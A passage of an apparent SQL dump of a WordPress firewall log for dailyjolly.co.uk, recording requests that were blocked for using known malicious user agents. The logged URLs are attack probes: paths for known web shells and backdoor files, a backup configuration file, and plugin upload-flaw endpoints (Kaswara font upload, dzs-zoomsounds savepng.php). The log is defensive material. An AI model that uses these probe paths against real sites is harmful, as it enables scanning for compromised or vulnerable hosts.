User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9rYXN3YXJhL2ZvbnRzX2ljb24vYTU3YnplODkzMS8uX19hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10853,1673835880.541591,1673835880.275900,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php?action=uploadFontIcon','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10854,1673835879.228830,1673835879.112800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10855,1673835878.883206,1673835878.758900,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/wp-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL3dwLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10856,1673835877.494864,1673835877.329400,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10857,1673835876.873767,1673835876.734000,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10858,1673835875.548185,1673835875.428000,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10859,1673835874.866353,1673835874.749900,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9JT3B0aW1pemVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10860,1673835874.270744,1673835874.138100,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10861,1673835873.419599,1673835873.248500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9zYXZlcG5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10862,1673836860.027436,1673836859.899400,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10863,1673836834.388650,1673836834.259200,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10864,1673836796.149483,1673836796.018500,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10865,1673836781.430083,1673836781.236100,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10866,1673841615.568376,1673841615.449200,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10867,1673841613.081670,1673841612.956300,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10868,1673841609.323098,1673841609.206500,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10869,1673841607.638568,1673841607.499800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10870,1673862786.131025,1673862785.955300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10871,1673862776.547491,1673862776.419600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10872,1673863395.306883,1673863395.190800,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10873,1673863395.114059,1673863394.980000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10874,1673863384.556182,1673863384.427300,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10875,1673863366.895091,1673863366.749000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10876,1673863355.459441,1673863355.324600,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10877,1673863343.025936,1673863342.888500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/css.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Nzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10878,1673863313.028775,1673863312.919000,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10879,1673863298.898621,1673863298.778800,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10880,1673863294.937524,1673863294.808700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10881,1673863284.255015,1673863284.121300,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10882,1673863207.067049,1673863206.898500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10883,1673863202.565930,1673863202.437500,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/qindex.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3FpbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10884,1673863198.266704,1673863198.087700,'\0\0\0\0\0\0\0\0\0\0��[��j',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin.php?daksldlkdsadas=1','www.bing.com','wp_is_mobile','blocked:waf','Known malicious 